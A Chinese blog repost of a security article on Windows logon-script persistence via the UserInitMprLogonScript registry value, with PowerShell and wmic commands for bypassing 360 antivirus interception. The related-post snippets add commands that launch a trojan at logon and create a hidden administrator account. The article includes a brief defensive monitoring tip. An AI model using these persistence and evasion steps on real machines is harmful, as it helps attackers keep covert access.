Logon Scripts的后门实现思路

最新推荐文章于 2024-03-25 15:03:09 发布
最新推荐文章于 2024-03-25 15:03:09 发布
阅读量1k 收藏 2
点赞数
文章标签: 操作系统 python
原文链接:https://yq.aliyun.com/articles/214056
版权
本文讲的是 Logon Scripts的后门实现思路依旧是对后门利用方法做介绍,本次介绍的是使用Logon Scripts的方法。然而我在研究过程中发现了一个特别的用法,脚本优先于杀毒软件执行,能够绕过杀毒软件对敏感操作的拦截,本文将要具体介绍这个技巧。

0x01 简介

· Logon Scripts用法

· 绕过360对wmi调用的拦截

· 特别用法

0x02 Logon Scripts用法

思路来自于Adam@Hexacorn,地址如下:

http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

简要介绍Logon Scripts的用法

注册表路径:HKCREnvironment

创建字符串键值: UserInitMprLogonScript

键值设置为bat的绝对路径:c:test11.bat

如下图

Logon Scripts的后门实现思路

bat内容如下:

start calc.exe

注销,登录

执行脚本11.bat,弹出计算器

0x03 绕过360对通过wmi修改环境变量的拦截

在之前的文章《Use CLR to maintain persistence》提到过使用wmic修改环境变量的方法

命令如下:

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"


wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

然而,360会对WMI的操作进行拦截,如下图

Logon Scripts的后门实现思路

其实通过WMI添加环境变量等价于在注册表HKCREnvironment新建键值

所以对WMI的操作可以通过写注册表的操作进行代替

以上WMI命令可替换为如下powershell代码:

New-ItemProperty "HKCU:Environment" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null

New-ItemProperty "HKCU:Environment" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null

0x04 特别用法

源于我的一个特别的想法

我在对该技巧研究的过程中,产生了一个有趣的想法,Logon Scripts启动的顺序是否优先于其他程序呢?

如果是的话,那么是否也优先于杀毒软件呢?

下面开始我的测试:

1、cmd输入如下代码

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"

不出意外,被拦截

2、设置Logon Scripts

11.bat代码如下:

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"

reg query HKEY_CURRENT_USEREnvironment /V test

pause

3、启用Logon Scripts

注册表路径:HKCREnvironment

创建字符串键值: UserInitMprLogonScript

键值设置为bat的绝对路径:c:test11.bat

由于调用WMI会被拦截,可以通过powershell实现,代码如下:

New-ItemProperty "HKCU:Environment" UserInitMprLogonScript -value "c:test11.bat" -propertyType string | Out-Null

4、注销,重新登录,测试

如果注册表HKCREnvironment成功被写入键值test REG_SZ I run faster!,说明Logon Scripts优先于杀毒软件执行,绕过杀毒软件的限制

完整操作如下图

Logon Scripts的后门实现思路

测试成功,验证我们的结论

0x05 防御

监控注册表键值HKCREnvironmentUserInitMprLogonScript

0x06 小结

本文对Logon Scripts的用法进行了测试,并且介绍了一个特别用法,Logon Scripts能够优先于杀毒软件执行,绕过杀毒软件对敏感操作的拦截。

站在防御的角度,要对此保持警惕。




原文发布时间为:2017年9月12日
本文作者:3gstudent
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
weixin_34082854
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NMLS - No More Logon Scripts-开源
05-04
没有更多的登录脚本! 将网络驱动器的UNC路径保存在ActiveDirectory架构扩展中,并通过通用C#登录程序自动连接它们。
fix协议logon实现
03-18
fix协议实现 logon消息 heart beat消息 ,验证了test request。
windows-bat批处理脚本编程总结
halazi100
06-09 2664
windows-BAT脚本编程总结to move one or more files: to rename a directory: 在cmd中输入,如即可查看系统给出的帮助文件。REM为注释命令,该命令后的内容不被执行,但能回显。暂停执行并给出提示每个命令结束可以查看是否执行成功,默认值为0,非0表示出错。 attr是代表控制台的背景色和前景色的两个十六进制值 系统变量 返回当前日期。使用与 date /t 命令相同的格式。 系统变量 返回当前时间。使用与 time /t 命令相同的格式。 系统变量 返
如何强制Logon script被执行
leyvan的专栏
07-16 4003
在 Windows Server 2003 环境中, 在你登入 Domain 时, 虽然网络联机尚未完全建立, 但其会先用其 Cache 中的认证来进行登入. 在这种状况下, 由于其登入后, 网络联机尚未完全建立, 因此 Logon scripts 有可能不会被执行. 下述做法, 可强迫该机器必须完成网络联机后, 才能进行登入.I. Computer Configuration → A
Logon script后门权限维持
qq_64787896的博客
03-25 178
1.在Win2008上cmd输入reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\1704423740.exe" ,添加注册表,开机即执行木马。实验要求:在2008用户登陆时,修改注册表,触发logon,执行木马,上线Viper。Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于。3.Viper成功上线,权限为system。执行,绕过杀毒软件对敏感操作的拦截。
windows权限维持的方法
小小猪的博客
01-04 5955
windows权限维持的方法 影子账户: 使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏 打开注册表(HKEY_LOCAL_MACHINE\SAM\SAM),修改SAM权限,赋予adminitrators完全控制权限 重启之后,将Administr.
Windows权限维持
Williamanddog的博客
02-10 426
logon scripts后门 Windows登录脚本,当用户登录时触发,Logon Scripts能够优先于杀毒软件执行,从而绕过杀毒软件对敏感操作的拦截。 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO 的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 自启动服务一般是在电脑启动后在后台加载指定的服务程序,我们可以将exe文件注册为服务,也可以 将dll文件注册为服务。
W10 BG Logon Changer
02-15
总的来说,W10 BG Logon Changer是一个方便用户自定义Windows 10登录屏幕背景的工具,它通过简单的步骤实现了对系统内部设置的调整,让用户的电脑更具个性。但与此同时,用户在使用时也应注意潜在风险,遵循安全的...
W10 BG Logon Changer 1.2.0.0
02-15
**W10 BG Logon Changer 1.2.0.0** 是一款专为Windows 10系统设计的桌面背景修改工具。该软件的主要功能是帮助用户自定义登录屏幕和桌面壁纸,使得用户可以个性化自己的操作系统界面,提升使用体验。 在Windows 10...
logon.pcapng
最新发布
05-07
logon.pcapng
windows操作系统常见持久性后门
weixin_42282189的博客
10-14 2585
windows操作系统常见持久性后门 0x00 简介 ​ 当我们拿到域中最高权限之后,就需要将自己的权限进行巩固,进行权限持久化操作。 0x01 隐藏账户 1.1 测试系统 win 7 1.2 新建特殊账户 在目标主机cmd中输入以下命令,创建一个名为whoami$的隐藏账户,并把该隐藏账户设置为管理员权限 net user whoami$ howe7 /add net localgroup administrators whoami$ /add ​ 注:创建的用户名必须以$符
修改注册表键值UserInitMprLogonScript达到权限维持
热门推荐
Shanfenglan's blog
11-11 10万+
CATALOG前言实现 前言 注册表HKCR\Environment\UserInitMprLogonScript键值所指的程序会在杀毒软件启动前启动,而且修改它不需要管理员权限,因此我们可以通过其来达到权限维持的效果。 实现 bat文件内容为regsvr32 calc.dll,直接执行发现被360拦截。 这时候我们通过修改注册表的方式来绕过这个拦截让其在360启动前执行。 在powershell中输入,注意修改路径: New-ItemProperty "HKCU:\Environment\" UserI
简单批处理内部命令简介
weixin_30753873的博客
07-04 983
批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁...
securecrt logon script sudo 自动登录
weixin_34026484的博客
03-21 558
2019独角兽企业重金招聘Python工程师标准>>> ...
windows中常见后门持久化方法总结
收集盒 Book box
11-13 1687
前言 当我们通过各种方法拿到一个服务器的权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法 后门持久化 我的操作环境是: 无AV、管理员权限(提权、免杀等是后门持久化的铺垫,当然有的方法也并不是全部需要这些铺垫) 操作系统:win7,windows server 2008R2,xp shift后门...
域组策略脚本登录自动运行
der69615的博客
06-23 4047
方法一: 新建共享目录存放脚本文件,需要应用的用户或组授予只读权限。 方法二: 将脚本放到在\\IP或主机名\sysvol\域名\Policies\唯一ID\USER\Scripts\Logon(登录)。 SYSVOL:是存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script...
\域名\sysvol\域名\policies{数字}\user\scripts\logon\logon.vbs
qq_40001564的博客
01-13 341
\域名\sysvol\域名\policies{数字}\user\scripts\logon\logon.vbs 组策略管理–组策略对象–编辑–计算机配置–策略–windows设置–脚本(启动/关机)–启动–属性–显示文件
恶意代码常见驻留分析
weixin_43781139的博客
07-26 2031
前言 恶意代码的一个重要功能就是要实现内存常驻,只要常驻内存,恶意代码就可以一直执行恶意行为,不会因为电脑重新启动、切换用户等原因停止。前文介绍的启动、Hook、注入中的很多技术都可以实现内存常驻,除此之外,恶意代码还可以利用一些系统功能实现内存常驻。本文就与你娓娓道来。 辅助功能 辅助功能介绍 windows提供了一些辅助功能,比如放大镜、讲述人等。Windows的辅助功能又叫做“轻松使用”,你可以在控制面板中查看他们。 这些辅助功能可以在用户登录界面启动,当你在登录界面按下win+U,就会弹出辅助功能的
SetGPRegistryValueSoftware\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logon
03-19
SetGPRegistryValueSoftware\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logon 是一个 Windows 系统中的一个组策略设置,用于在用户登录时运行特定的脚本。这个设置通常用于自动执行一些任务,例如映射网络驱动器、启动应用程序等。 要修改这个设置,你可以按照以下步骤操作: 1. 打开“运行”对话框(快捷键 Win + R),输入 `gpedit.msc`,然后按回车键打开本地组策略编辑器。 2. 在左侧导航栏中,依次展开“计算机配置” > “管理模板” > “系统” > “登录”。 3. 在右侧窗口中找到“运行登录脚本”,双击打开。 4. 在弹出的对话框中,选择“已启用”,然后在下方的文本框中输入你要运行的脚本的完整路径。 5. 点击“确定”保存设置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值